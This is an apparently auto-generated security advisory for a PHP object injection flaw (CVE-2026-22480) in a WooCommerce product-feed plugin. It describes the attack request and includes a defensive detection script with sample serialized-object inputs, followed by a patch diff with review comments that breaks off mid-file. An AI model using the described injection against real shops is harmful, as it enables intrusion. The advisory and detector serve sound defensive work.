Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-22480: WebToffee WooCommerce Product Feeds – Google Shopping, Pinterest, TikTok Ads, & More <= 2.3.3 – Authenticated (Shop manager+) PHP Object Injection (webtoffee-product-feed)

Severity Medium (CVSS 6.6)
CWE 502
Vulnerable Version 2.3.3
Patched Version 2.3.4
Disclosed March 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-22480:
The vulnerability is a PHP object injection flaw in the WebToffee WooCommerce Product Feeds plugin for WordPress. The root cause is the unsafe deserialization of user-controlled input from the `$_POST['form_data']` parameter. In the vulnerable plugin versions (<=2.3.3), multiple AJAX handler functions pass this parameter directly to `maybe_unserialize(wp_unslash(…))`. This function deserializes the input without validation, allowing an attacker to inject arbitrary PHP objects.

The exploitation method requires an authenticated attacker with shop manager or higher privileges. The attack vector targets the plugin's AJAX endpoints, specifically the `wt_product_feed` AJAX actions handled in `/wp-admin/admin-ajax.php`. The vulnerable code paths are in `admin/modules/cron/cron.php` lines 1122 and 1362, `admin/modules/export/classes/class-export-ajax.php` lines 196, 306, and 673, and `helpers/class-wt-common-helper.php` where the `process_formdata` method is called.

An attacker can send a crafted POST request to `/wp-admin/admin-ajax.php` with `action` set to one of the plugin's AJAX handlers (e.g., `wt_product_feed_export_ajax`) and a malicious serialized object in the `form_data` parameter. The payload would contain a serialized PHP object that, when deserialized, triggers a POP (Property-Oriented Programming) chain if a suitable gadget chain exists in the target environment.

The patch replaces the unsafe `maybe_unserialize(wp_unslash(…))` call with a new `wt_decode_data` method. This new method appears to implement safe data decoding, likely using JSON decoding or another non-PHP serialization format. The fix is applied consistently across all vulnerable locations, ensuring that user-supplied `form_data` is never passed to PHP's unserialize function.

If exploited successfully, this vulnerability allows authenticated attackers to perform PHP object injection. While no known POP chain exists within the vulnerable plugin itself, the presence of compatible gadget chains in other installed plugins or themes could lead to arbitrary file deletion, sensitive data retrieval, or remote code execution. The CVSS score of 6.6 reflects the requirement for shop manager privileges and the need for external POP chains to achieve maximum impact.
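
A triage check for the request described above, added here as an example (it is not code from Atomic Edge or from the plugin): it walks the PHP serialization grammar in a captured `admin-ajax.php` POST body and reports class names found in `form_data`, skipping string contents by their declared length so object-looking text inside a string is not flagged. The sample bodies are constructed, the function names are hypothetical, and the `wt_product_feed` action prefix is taken from the analysis.

```python
"""Report PHP-serialized objects in the form_data field of a captured POST body."""
from urllib.parse import parse_qs, urlencode

OBJECT_TAGS = (b"O", b"C", b"E")  # object, Serializable object, enum case


def _number(data, pos, stop=b":"):
    """Read an unsigned integer ending at `stop`; return (value, index after stop)."""
    end = data.index(stop, pos)  # ValueError when the delimiter is missing
    digits = data[pos:end]
    if not digits.isdigit():
        raise ValueError(f"expected digits at byte {pos}")
    return int(digits), end + 1


def _expect(data, pos, literal):
    """Require `literal` at pos; return the index after it."""
    if data[pos:pos + len(literal)] != literal:
        raise ValueError(f"expected {literal!r} at byte {pos}")
    return pos + len(literal)


def _body(data, pos, n_values, classes):
    """Consume '{', n_values serialized values, and '}'."""
    pos = _expect(data, pos, b"{")
    for _ in range(n_values):
        pos = _walk(data, pos, classes)
    return _expect(data, pos, b"}")


def _walk(data, pos, classes):
    """Consume one serialized value at pos, recording class names as they appear."""
    tag = data[pos:pos + 1]
    if tag == b"N":
        return _expect(data, pos, b"N;")
    pos = _expect(data, pos + 1, b":")
    if tag in (b"b", b"i", b"d", b"r", b"R"):
        return data.index(b";", pos) + 1
    if tag == b"s":  # s:LEN:"...": skip LEN bytes without looking inside
        size, pos = _number(data, pos)
        pos = _expect(data, pos, b'"')
        return _expect(data, pos + size, b'";')
    if tag == b"a":  # a:COUNT:{key value ...}
        count, pos = _number(data, pos)
        return _body(data, pos, 2 * count, classes)
    if tag in OBJECT_TAGS:
        size, pos = _number(data, pos)
        pos = _expect(data, pos, b'"')
        classes.append(data[pos:pos + size].decode("utf-8", "replace"))
        pos = _expect(data, pos + size, b'"')
        if tag == b"E":  # E:LEN:"Class:Case";
            return _expect(data, pos, b";")
        pos = _expect(data, pos, b":")
        count, pos = _number(data, pos)
        if tag == b"C":  # C:LEN:"Class":BYTES:{opaque payload}
            pos = _expect(data, pos, b"{")
            return _expect(data, pos + count, b"}")
        return _body(data, pos, 2 * count, classes)  # O:LEN:"Class":COUNT:{...}
    raise ValueError(f"unknown type tag {tag!r} at byte {pos}")


def object_classes(value: str) -> list[str]:
    """Class names a PHP unserialize() call would be asked to instantiate."""
    data = value.strip().encode("utf-8")  # maybe_unserialize() trims its input too
    classes: list[str] = []
    try:
        _walk(data, 0, classes)
    except (ValueError, RecursionError):
        pass  # report what was seen before the parse error rather than ignoring it
    return classes


def inspect_body(body: str, action_prefix: str = "wt_product_feed"):
    """Return {'action', 'classes'} for matching AJAX actions, else None."""
    fields = parse_qs(body, keep_blank_values=True)
    action = fields.get("action", [""])[0]
    if not action.startswith(action_prefix):
        return None
    classes = [c for v in fields.get("form_data", []) for c in object_classes(v)]
    return {"action": action, "classes": classes}


def _post(form_data, action="wt_product_feed_export_ajax"):
    return urlencode({"action": action, "form_data": form_data})


# Constructed sample bodies (not captured traffic).
SAMPLES = {
    "legacy_array": _post('a:2:{s:4:"name";s:9:"feed-test";s:5:"limit";i:50;}'),
    "object_text_in_string": _post('a:1:{s:4:"note";s:19:"O:8:"stdClass":0:{}";}'),
    "nested_object": _post('a:1:{s:4:"opts";O:8:"stdClass":1:{s:1:"x";i:1;}}'),
    "truncated_after_object": _post('a:2:{i:0;O:8:"stdClass":0:{}i:1;'),
    "json": _post('{"name":"feed-test"}'),
    "other_action": _post('O:8:"stdClass":0:{}', action="heartbeat"),
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, inspect_body(body))
```

On a site still running 2.3.3 or earlier, any non-empty `classes` result for these actions is worth investigating, since the plugin's own form data has no reason to carry objects.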

Differential between vulnerable and patched code

Code Diff
--- a/webtoffee-product-feed/admin/modules/cron/cron.php
+++ b/webtoffee-product-feed/admin/modules/cron/cron.php
@@ -1119,7 +1119,9 @@
 		}

 		/* process form data */
-		$form_data=(isset($_POST['form_data']) ? Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata(maybe_unserialize(wp_unslash($_POST['form_data']))) : array()); //phpcs:ignore
+		$form_data = isset( $_POST['form_data'] ) ? Webtoffee_Product_Feed_Sync_Common_Helper::wt_decode_data( $_POST['form_data'] ) : array(); //phpcs:ignore
+		/* process form data */
+		$form_data = Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata($form_data);

 		/* loading export module class object */
 		$this->module_obj=Webtoffee_Product_Feed_Sync::load_modules($action_type);
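Review bot: The added `wt_decode_data( $_POST['form_data'] )` call drops the `wp_unslash()` that the removed line applied, so the decoder now receives the slashed superglobal value. Unless `wt_decode_data` unslashes internally, quotes and backslashes in the payload reach it escaped and decoding can fail or alter values; keep `wp_unslash()` at the call site or document that the helper handles it. The added `/* process form data */` comment also duplicates the context comment two lines above it; the first one should describe the decode step.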
@@ -1359,7 +1361,9 @@
         $cron_form_details = maybe_unserialize($cron_details['data']);

         /* process form data */
-        $form_data = (isset($_POST['form_data']) ? Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata(maybe_unserialize(wp_unslash($_POST['form_data']))) : array()); //phpcs:ignore
+		$form_data = isset( $_POST['form_data'] ) ? Webtoffee_Product_Feed_Sync_Common_Helper::wt_decode_data( $_POST['form_data'] ) : array(); //phpcs:ignore
+		/* process form data */
+		$form_data = Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata($form_data);

         /* loading export module class object */
         $this->module_obj = Webtoffee_Product_Feed_Sync::load_modules($action_type);
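Review bot: The context line `$cron_form_details = maybe_unserialize($cron_details['data']);` at the top of this hunk stays on PHP deserialization while the request input below it moves to `wt_decode_data`. If the stored cron data is derived from a submitted form, it should go through the same decoder, or a comment should state why that stored value is trusted. The added lines are also tab-indented inside a block that is indented with spaces.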
--- a/webtoffee-product-feed/admin/modules/export/classes/class-export-ajax.php
+++ b/webtoffee-product-feed/admin/modules/export/classes/class-export-ajax.php
@@ -193,7 +193,10 @@
 		if( 0 == $offset ) /* first batch */
 		{
 			/* process form data */
-			$form_data=(isset($_POST['form_data']) ? Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata(maybe_unserialize(wp_unslash($_POST['form_data']))) : array()); //phpcs:ignore
+			$form_data = isset( $_POST['form_data'] ) ? Webtoffee_Product_Feed_Sync_Common_Helper::wt_decode_data( $_POST['form_data'] ) : array(); //phpcs:ignore
+			/* process form data */
+			$form_data = Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata($form_data);
+
 			//sanitize form data
 			$form_data=Wt_Pf_IE_Basic_Helper::sanitize_formdata($form_data, $this->export_obj);

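Review bot: Nothing between `wt_decode_data(...)` and `process_formdata($form_data)` in this first-batch path checks that the decoder returned an array, and the value then goes straight into `sanitize_formdata`. The template loader in this same file falls back with `!is_array($decoded_form_data) ? array() : $decoded_form_data`; apply the same guard here so a scalar or failed decode cannot reach the helpers.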
@@ -300,8 +303,10 @@

 			$tb=$wpdb->prefix. Webtoffee_Product_Feed_Sync::$template_tb;

+			/* decode data */
+			$form_data = isset( $_POST['form_data'] ) ? Webtoffee_Product_Feed_Sync_Common_Helper::wt_decode_data( $_POST['form_data'] ) : array(); //phpcs:ignore
 			/* process form data */
-			$form_data=(isset($_POST['form_data']) ? Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata(maybe_unserialize(wp_unslash($_POST['form_data']))) : array()); //phpcs:ignore
+			$form_data = Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata($form_data);

 			//sanitize form data
 			$form_data=Wt_Pf_IE_Basic_Helper::sanitize_formdata($form_data, $this->export_obj);
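Review bot: The bare `//phpcs:ignore` on the added `$_POST['form_data']` line suppresses every sniff for that line, including the nonce-verification and input-sanitization checks that matter most on a read of request input. Name the specific sniffs being waived and give the reason, so a later edit to this line does not inherit a blanket exemption.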
@@ -666,7 +671,9 @@
 		$template_data=$this->get_mapping_template_by_id($id);
 		if($template_data)
 		{
-			$decoded_form_data=Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata(maybe_unserialize($template_data['data']));
+			$decoded_form_data = isset( $template_data['data'] ) ? Webtoffee_Product_Feed_Sync_Common_Helper::wt_decode_data( $template_data['data'] ) : array(); //phpcs:ignore
+			/* process form data */
+			$decoded_form_data = Webtoffee_Product_Feed_Sync_Common_Helper::process_formdata($decoded_form_data);
 			$this->selected_template_form_data=(!is_array($decoded_form_data) ? array() : $decoded_form_data);
 		}
 	}
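Review bot: The removed line read `$template_data['data']` with `maybe_unserialize`, which implies templates saved by 2.3.3 and earlier are stored PHP-serialized, and the added line switches the reader to `wt_decode_data` with no visible migration or fallback. Confirm the decoder still loads those rows without instantiating objects; otherwise existing mapping templates will silently load as `array()` through the `!is_array` fallback on the next line. The `//phpcs:ignore` is also unnecessary here, since this line reads no superglobal.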
--- a/webtoffee-product-feed/helpers/class-wt-common-helper.php
+++ b/webtoffee-product-feed/helpers/class-wt-common-helper.php
@@ -1,683 +1,830 @@
 <?php
 if(!class_exists('Webtoffee_Product_Feed_Sync_Common_Helper')){
-class Webtoffee_Product_Feed_Sync_Common_Helper
-{
-
-    public static $min_version_msg='';
-
-   /**
-   *  Check the minimum base version required for post type modules
-   *
-   */
-    public static function check_base_version($post_type, $post_type_title, $min_version)
-    {
-        $warn_icon='<span class="dashicons dashicons-warning"></span> ';
-        if(!version_compare(WEBTOFFEE_PRODUCT_FEED_SYNC_VERSION, $min_version, '>=')) /* not matching the min version */
-        {
-            // translators: %1$s is the post type title, %2$s is the plugin name, %3$s is the minimum version, %4$s is the plugin name again
-            self::$min_version_msg.=$warn_icon.sprintf(esc_html__("The %1$s requires a minimum version of %2$s %3$s. Please upgrade the %4$s accordingly.", 'webtoffee-product-feed'), "<b>$post_type_title</b>", "<b>".WT_PRODUCT_FEED_PLUGIN_NAME."</b>", "<b>v$min_version</b>", "<b>".WT_PRODUCT_FEED_PLUGIN_NAME."</b>").'<br />';
-            add_action('admin_notices', array(__CLASS__, 'no_minimum_base_version') );
-            return false;
-        }
-        return true;
-    }
-
-    /**
-    *
-    *   No minimum version error message
-    */
-    public static function no_minimum_base_version()
-    {
-        ?>
-        <div class="notice notice-warning">
-            <p>
-                <?php
-                echo wp_kses_post( self::$min_version_msg );
-                ?>
-            </p>
-        </div>
-        <?php
-    }
-
-		/**
-	 * Gets the product categories.
-	 *
-	 * @return array
-	 */
-	public static function get_product_categories($slugged=false) {
-
-                $out = array();
-                $category_args = [
-                            'taxonomy'		 => 'product_cat',
-                            'orderby'		 => 'term_group',
-                            'title_li'		 => '',
-                            'hide_empty'	 => 1,
-                ];
-                $product_categories = get_categories( $category_args );
-                if (!is_wp_error($product_categories)) {
-                    foreach ($product_categories as $category) {
-                            $out[$category->term_id] =  array(
-                                    'slug' => $category->slug,
-                                    'name' => $category->name
-                                );
-                    }
-                }
-                return $out;
-	}
-
-
-	/**
-	 * Local Attribute List to map product value with merchant attributes
-	 *
-	 * @param string $selected
-	 *
-	 * @return string
-	 */
-	public static function attribute_dropdown( $export_channel, $selected = '' ) {
-
-		$attribute_dropdown = wp_cache_get( 'wt_feed_dropdown_product_attributes_v11' );
-
-		if ( false === $attribute_dropdown ) {
-			$attributes = array(
-				'id'                        => esc_attr__( 'Product Id', 'webtoffee-product-feed' ),
-				'title'                     => esc_attr__( 'Product Title', 'webtoffee-product-feed' ),
-                                'parent_title'              => esc_attr__( 'Parent Title', 'webtoffee-product-feed' ),
-				'description'               => esc_attr__( 'Product Description', 'webtoffee-product-feed' ),
-				'short_description'         => esc_attr__( 'Product Short Description', 'webtoffee-product-feed' ),
-                                'parent_description'        => esc_attr__( 'Parent Description', 'webtoffee-product-feed' ),
-				'product_type'              => esc_attr__( 'Product Local Category', 'webtoffee-product-feed' ),
-				'link'                      => esc_attr__( 'Product URL', 'webtoffee-product-feed' ),
-				'ex_link'                   => esc_attr__( 'External Product URL', 'webtoffee-product-feed' ),
-				'condition'                 => esc_attr__( 'Condition', 'webtoffee-product-feed' ),
-				'item_group_id'             => esc_attr__( 'Parent Id [Group Id]', 'webtoffee-product-feed' ),
-				'sku'                       => esc_attr__( 'SKU', 'webtoffee-product-feed' ),
-				'sku_id'                    => esc_attr__( 'SKU+ID[sku_id]', 'webtoffee-product-feed' ),
-				'parent_sku'                => esc_attr__( 'Parent SKU', 'webtoffee-product-feed' ),
-				'availability'              => esc_attr__( 'Availability', 'webtoffee-product-feed' ),
-                                'availability_date'         => esc_attr__( 'Availability date', 'webtoffee-product-feed' ),
-				'quantity'                  => esc_attr__( 'Quantity', 'webtoffee-product-feed' ),
-				'price'                     => esc_attr__( 'Regular Price', 'webtoffee-product-feed' ),
-				'current_price'             => esc_attr__( 'Price', 'webtoffee-product-feed' ),
-				'sale_price'                => esc_attr__( 'Sale Price', 'webtoffee-product-feed' ),
-				'price_with_tax'            => esc_attr__( 'Regular Price With Tax', 'webtoffee-product-feed' ),
-				'current_price_with_tax'    => esc_attr__( 'Price With Tax', 'webtoffee-product-feed' ),
-				'sale_price_with_tax'       => esc_attr__( 'Sale Price With Tax', 'webtoffee-product-feed' ),
-				'sale_price_sdate'          => esc_attr__( 'Sale Start Date', 'webtoffee-product-feed' ),
-				'sale_price_edate'          => esc_attr__( 'Sale End Date', 'webtoffee-product-feed' ),
-				'weight'                    => esc_attr__( 'Weight', 'webtoffee-product-feed' ),
-                                'weightnunit'               => esc_attr__( 'Weight+Unit', 'webtoffee-product-feed' ),
-				'width'                     => esc_attr__( 'Width', 'webtoffee-product-feed' ),
-                                'widthnunit'                => esc_attr__( 'Width+Unit', 'webtoffee-product-feed' ),
-				'height'                    => esc_attr__( 'Height', 'webtoffee-product-feed' ),
-                                'heightnunit'               => esc_attr__( 'Height+Unit', 'webtoffee-product-feed' ),
-				'length'                    => esc_attr__( 'Length', 'webtoffee-product-feed' ),
-                                'lengthnunit'               => esc_attr__( 'Length+Unit', 'webtoffee-product-feed' ),
-				'shipping_class'            => esc_attr__( 'Shipping Class', 'webtoffee-product-feed' ),
-				'type'                      => esc_attr__( 'Product Type', 'webtoffee-product-feed' ),
-				'variation_type'            => esc_attr__( 'Variation Type', 'webtoffee-product-feed' ),
-				'visibility'                => esc_attr__( 'Visibility', 'webtoffee-product-feed' ),
-				'rating_total'              => esc_attr__( 'Total Rating', 'webtoffee-product-feed' ),
-				'rating_average'            => esc_attr__( 'Average Rating', 'webtoffee-product-feed' ),
-				'tags'                      => esc_attr__( 'Tags', 'webtoffee-product-feed' ),
-				'sale_price_effective_date' => esc_attr__( 'Sale Price Effective Date', 'webtoffee-product-feed' ),
-				'is_bundle'                 => esc_attr__( 'Is Bundle', 'webtoffee-product-feed' ),
-				'author_name'               => esc_attr__( 'Author Name', 'webtoffee-product-feed' ),
-				'author_email'              => esc_attr__( 'Author Email', 'webtoffee-product-feed' ),
-				'date_created'              => esc_attr__( 'Date Created', 'webtoffee-product-feed' ),
-				'date_updated'              => esc_attr__( 'Date Updated', 'webtoffee-product-feed' ),
-				'identifier_exists'         => esc_attr__( 'Identifier Exists', 'webtoffee-product-feed' ),
-                                'promotion_id'              => esc_attr__( 'Product Id / Promotion Id', 'webtoffee-product-feed' ),
-                                'long_title'                => esc_attr__( 'Product Title', 'webtoffee-product-feed' ),
-                                'promotion_effective_dates' => esc_attr__( 'Promotion effective dates', 'webtoffee-product-feed' ),
-
-                                // PriceRunner fields
-                                'ProductId' => 'Product Id[ProductId]',
-                                'ProductName' => 'Product Title[ProductName]',
-                                'Description' => 'Product Description[Description]',
-                                'Url' => 'Product URL[Url]',
-                                'Category' => 'Product Categories[Category] ',
-                                'ImageUrl' => 'Main Image[ImageUrl]',
-                                'Condition' => 'Condition[condition]',
-                                'checkout_link_template' => 'checkout_link_template',
-                                'Price' => 'Price[Price]',
-                                'ShippingCost' => 'ShippingCost[ShippingCost]',
-                                'StockStatus' => 'StockStatus[StockStatus]',
-                                'LeadTime' => 'LeadTime[LeadTime]',
-                                'Brand' => 'Brand[Brand]',
-                                'Msku' => 'Msku[Msku]',
-                                'Ean' => 'Ean[Ean]',
-                                'AdultContent' => 'AdultContent[AdultContent]',
-                                'AgeGroup' => 'AgeGroup[AgeGroup]',
-                                'Bundled' => 'Bundled[Bundled]',
-                                'Multipack' => 'Multipack[Multipack]',
-                                'Pattern' => 'Pattern[Pattern]',
-                                'Size' => 'Size[Size]',
-                                'SizeSystem' => 'SizeSystem[SizeSystem]',
-                                'Color' => 'Color[Color]',
-                                'EnergyEfficiencyClass' => 'EnergyEfficiencyClass[EnergyEfficiencyClass]',
-                                'Gender' => 'Gender[Gender]',
-                                'Material' => 'Material[Material]',
-                                'GroupId' => 'GroupId[GroupId]',
-								'fb_override' => 'Facebook Override',
+	class Webtoffee_Product_Feed_Sync_Common_Helper
+	{
+
+		public static $min_version_msg='';

-			);
-			$images     = array(
-				'image_link'    => esc_attr__( 'Main Image', 'webtoffee-product-feed' ),
-				'feature_image' => esc_attr__( 'Featured Image', 'webtoffee-product-feed' ),
-				'additional_image_link'        => esc_attr__( 'Images [Comma Separated]', 'webtoffee-product-feed' ),
-				'wtimages_1'       => esc_attr__( 'Additional Image 1', 'webtoffee-product-feed' ),
-				'wtimages_2'       => esc_attr__( 'Additional Image 2', 'webtoffee-product-feed' ),
-				'wtimages_3'       => esc_attr__( 'Additional Image 3', 'webtoffee-product-feed' ),
-				'wtimages_4'       => esc_attr__( 'Additional Image 4', 'webtoffee-product-feed' ),
-				'wtimages_5'       => esc_attr__( 'Additional Image 5', 'webtoffee-product-feed' ),
-				'wtimages_6'       => esc_attr__( 'Additional Image 6', 'webtoffee-product-feed' ),
-				'wtimages_7'       => esc_attr__( 'Additional Image 7', 'webtoffee-product-feed' ),
-				'wtimages_8'       => esc_attr__( 'Additional Image 8', 'webtoffee-product-feed' ),
-				'wtimages_9'       => esc_attr__( 'Additional Image 9', 'webtoffee-product-feed' ),
-				'wtimages_10'      => esc_attr__( 'Additional Image 10', 'webtoffee-product-feed' ),
-			);
-
-			$attribute_dropdown = '<option></option>';
-			$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Constant', 'webtoffee-product-feed' ) );
-			$attribute_dropdown .= sprintf( '<option style="font-weight: bold;" value="%s">%s</option>', 'wt-static-map-vl', esc_attr__( 'Static value', 'webtoffee-product-feed' ) );
-			$attribute_dropdown .= '</optgroup>';
-
-			if ( is_array( $attributes ) && ! empty( $attributes ) ) {
-				$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Primary Attributes', 'webtoffee-product-feed' ) );
-				foreach ( $attributes as $key => $value ) {
-					$attribute_dropdown .= sprintf( '<option value="%s">%s</option>', $key, $value );
-				}
-				$attribute_dropdown .= '</optgroup>';
-			}
-
-			if ( is_array( $images ) && ! empty( $images ) ) {
-				$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Image Attributes', 'webtoffee-product-feed' ) );
-				foreach ( $images as $key => $value ) {
-					$attribute_dropdown .= sprintf( '<option value="%s">%s</option>', $key, $value );
-				}
-				$attribute_dropdown .= '</optgroup>';
+		/**
+		 *  Check the minimum base version required for post type modules
+		 *
+		 */
+		public static function check_base_version($post_type, $post_type_title, $min_version)
+		{
+			$warn_icon='<span class="dashicons dashicons-warning"></span> ';
+			if(!version_compare(WEBTOFFEE_PRODUCT_FEED_SYNC_VERSION, $min_version, '>=')) /* not matching the min version */
+			{
+				// translators: %1$s is the post type title, %2$s is the plugin name, %3$s is the minimum version, %4$s is the plugin name again
+				self::$min_version_msg.=$warn_icon.sprintf(esc_html__("The %1$s requires a minimum version of %2$s %3$s. Please upgrade the %4$s accordingly.", 'webtoffee-product-feed'), "<b>$post_type_title</b>", "<b>".WT_PRODUCT_FEED_PLUGIN_NAME."</b>", "<b>v$min_version</b>", "<b>".WT_PRODUCT_FEED_PLUGIN_NAME."</b>").'<br />';
+				add_action('admin_notices', array(__CLASS__, 'no_minimum_base_version') );
+				return false;
 			}
-
-			$meta_in_mapping = apply_filters('wt_pf_allow_meta_in_mapping', true);
-			if($meta_in_mapping){
-				$product_metas = self::get_product_metakeys();
-				if ( is_array( $product_metas ) && ! empty( $product_metas ) ) {
-					$attribute_dropdown .= sprintf( '<optgroup label="%s">', esc_attr__( 'Custom Fields/Post Meta', 'webtoffee-product-feed' ) );
-					foreach ( $product_metas as $key => $value ) {
+			return true;
+		}
+
+		/**
+		*
+		*   No minimum version error message
+		*/
+		public static function no_minimum_base_version()
+		{
+			?>
+			<div class="notice notice-warning">
+				<p>
+					<?php
+					echo wp_kses_post( self::$min_version_msg );
+					?>
+				</p>
+			</div>
+			<?php
+		}
+
+			/**
+		 * Gets the product categories.
+		 *
+		 * @return array
+		 */
+		public static function get_product_categories($slugged=false) {
+
+					$out = array();
+					$category_args = [
+								'taxonomy'		 => 'product_cat',
+								'orderby'		 => 'term_group',
+								'title_li'		 => '',
+								'hide_empty'	 => 1,
+					];
+					$product_categories = get_categories( $category_args );
+					if (!is_wp_error($product_categories)) {
+						foreach ($product_categories as $category) {
+								$out[$category->term_id] =  array(
+										'slug' => $category->slug,
+										'name' => $category->name
+									);
+						}
+					}
+					return $out;
+		}
+
+
+		/**
+		 * Local Attribute List to map product value with merchant attributes
+		 *
+		 * @param string $selected
+		 *
+		 * @return string
+		 */
+		public static function attribute_dropdown( $export_channel, $selected = '' ) {
+
+			$attribute_dropdown = wp_cache_get( 'wt_feed_dropdown_product_attributes_v11' );
+
+			if ( false === $attribute_dropdown ) {
+				$attributes = array(
+					'id'                        => esc_attr__( 'Product Id', 'webtoffee-product-feed' ),
+					'title'                     => esc_attr__( 'Product Title', 'webtoffee-product-feed' ),
+									'parent_title'              => esc_attr__( 'Parent Title', 'webtoffee-product-feed' ),
+					'description'               => esc_attr__( 'Product Description', 'webtoffee-product-feed' ),
+					'short_description'         => esc_attr__( 'Product Short Description', 'webtoffee-product-feed' ),
+									'parent_description'        => esc_attr__( 'Parent Description', 'webtoffee-product-feed' ),
+					'product_type'              => esc_attr__( 'Product Local Category', 'webtoffee-product-feed' ),
+					'link'                      => esc_attr__( 'Product URL', 'webtoffee-product-feed' ),
+					'ex_link'                   => esc_attr__( 'External Product URL', 'webtoffee-product-feed' ),
+					'condition'                 => esc_attr__( 'Condition', 'webtoffee-product-feed' ),
+					'item_group_id'             => esc_attr__( 'Parent Id [Group Id]', 'webtoffee-product-feed' ),
+					'sku'                       => esc_attr__( 'SKU', 'webtoffee-product-feed' ),
+					'sku_id'                    => esc_attr__( 'SKU+ID[sku_id]', 'webtoffee-product-feed' ),
+					'parent_sku'                => esc_attr__( 'Parent SKU', 'webtoffee-product-feed' ),
+					'availability'              => esc_attr__( 'Availability', 'webtoffee-product-feed' ),
+									'availability_date'         => esc_attr__( 'Availability date', 'webtoffee-product-feed' ),
+					'quantity'                  => esc_attr__( 'Quantity', 'webtoffee-product-feed' ),
+					'price'                     => esc_attr__( 'Regular Price', 'webtoffee-product-feed' ),
+					'current_price'             => esc_attr__( 'Price', 'webtoffee-product-feed' ),
+					'sale_price'                => esc_attr__( 'Sale Price', 'webtoffee-product-feed' ),
+					'price_with_tax'            => esc_attr__( 'Regular Price With Tax', 'webtoffee-product-feed' ),
+					'current_price_with_tax'    => esc_attr__( 'Price With Tax', 'webtoffee-product-feed' ),
+					'sale_price_with_tax'       => esc_attr__( 'Sale Price With Tax', 'webtoffee-product-feed' ),
+					'sale_price_sdate'          => esc_attr__( 'Sale Start Date', 'webtoffee-product-feed' ),
+					'sale_price_edate'          => esc_attr__( 'Sale End Date', 'webtoffee-product-feed' ),
+					'weight'                    => esc_attr__( 'Weight', 'webtoffee-product-feed' ),
+									'weightnunit'               => esc_attr__( 'Weight+Unit', 'webtoffee-product-feed' ),
+					'width'                     => esc_attr__( 'Width', 'webtoffee-product-feed' ),
+									'widthnunit'                => esc_attr__( 'Width+Unit', 'webtoffee-product-feed' ),
+					'height'                    => esc_attr__( 'Height', 'webtoffee-product-feed' ),
+									'heightnunit'               => esc_attr__( 'Height+Unit', 'webtoffee-product-feed' ),
+					'length'                    => esc_attr__( 'Length', 'webtoffee-product-feed' ),
+									'lengthnunit'               => esc_attr__( 'Length+Unit', 'webtoffee-product-feed' ),
+					'shipping_class'            => esc_attr__( 'Shipping Class', 'webtoffee-product-feed' ),
+					'type'                      => esc_attr__( 'Product Type', 'webtoffee-product-feed' ),
+					'variation_type'            => esc_attr__( 'Variation Type', 'webtoffee-product-feed' ),
+					'visibility'                => esc_attr__( 'Visibility', 'webtoffee-product-feed' ),
+					'rating_total'              => esc_attr__( 'Total Rating', 'webtoffee-product-feed' ),
+					'rating_average'            => esc_attr__( 'Average Rating', 'webtoffee-product-feed' ),
+					'tags'                      => esc_attr__( 'Tags', 'webtoffee-product-feed' ),
+					'sale_price_effective_date' => esc_attr__( 'Sale Price Effective Date', 'webtoffee-product-feed' ),
+					'is_bundle'                 => esc_attr__( 'Is Bundle', 'webtoffee-product-feed' ),
+					'author_name'               => esc_attr__( 'Author Name', 'webtoffee-product-feed' ),
+					'author_email'              => esc_attr__( 'Author Email', 'webtoffee-product-feed' ),
+					'date_created'              => esc_attr__( 'Date Created', 'webtoffee-product-feed' ),
+					'date_updated'              => esc_attr__( 'Date Updated', 'webtoffee-product-feed' ),
+					'identifier_exists'         => esc_attr__( 'Identifier Exists', 'webtoffee-product-feed' ),
+									'promotion_id'              => esc_attr__( 'Product Id / Promotion Id', 'webtoffee-product-feed' ),
+									'long_title'                => esc_attr__( 'Product Title', 'webtoffee-product-feed' ),
+									'promotion_effective_dates' => esc_attr__( 'Promotion effective dates', 'webtoffee-product-feed' ),
+
+									// PriceRunner fields
+									'ProductId' => 'Product Id[ProductId]',
+									'ProductName' => 'Product Title[ProductName]',
+									'Description' => 'Product Description[Description]',
+									'Url' => 'Product URL[Url]',
+									'Category' => 'Product Categories[Category] ',
+									'ImageUrl' => 'Main Image[ImageUrl]',
+									'Condition' => 'Condition[condition]',
+									'checkout_link_template' => 'checkout_link_template',
+									'Price' => 'Price[Price]',
+									'ShippingCost' => 'ShippingCost[ShippingCost]',
+									'StockStatus' => 'StockStatus[StockStatus]',
+									'LeadTime' => 'LeadTime[LeadTime]',
+									'Brand' => 'Brand[Brand]',
+									'Msku' => 'Msku[Msku]',
+									'Ean' => 'Ean[Ean]',
+									'AdultContent' => 'AdultContent[AdultContent]',
+									'AgeGroup' => 'AgeGroup[AgeGroup]',
+									'Bundled' => 'Bundled[Bundled]',
+									'Multipack' => 'Multipack[Multipack]',
+									'Pattern' => 'Pattern[Pattern]',
+									'Size' => 'Size[Size]',
+									'SizeSystem' => 'SizeSystem[SizeSystem]',
+									'Color' => 'Color[Color]',
+									'EnergyEfficiencyClass' => 'EnergyEfficiencyClass[EnergyEfficiencyClass]',
+									'Gender' => 'Gender[Gender]',
+									'Material' => 'Material[Material]',
+									'GroupId' => 'GroupId[GroupId]',
+									'fb_override' => 'Facebook Override',
+
+				);
+				$images     = array(
+					'image_link'    => esc_attr__( 'Main Image', 'webtoffee-product-feed' ),
+					'feature_image' => esc_attr__( 'Featured Image', 'webtoffee-product-feed' ),
+					'additional_image_link'        => esc_attr__( 'Images [Comma Separated]', 'webtoffee-product-feed' ),
+					'wtimages_1'       => esc_attr__( 'Additional Image 1', 'webtoffee-product-feed' ),
+					'wtimages_2'       => esc_attr__( 'Additional Image 2', 'webtoffee-product-feed' ),
+					'wtimages_3'       => esc_attr__( 'Additional Image 3', 'webtoffee-product-feed' ),
+					'wtimages_4'       => esc_attr__( 'Additional Image 4', 'webtoffee-product-feed' ),
+					'wtimages_5'       => esc_attr__( 'Additional Image 5', 'webtoffee-product-feed' ),
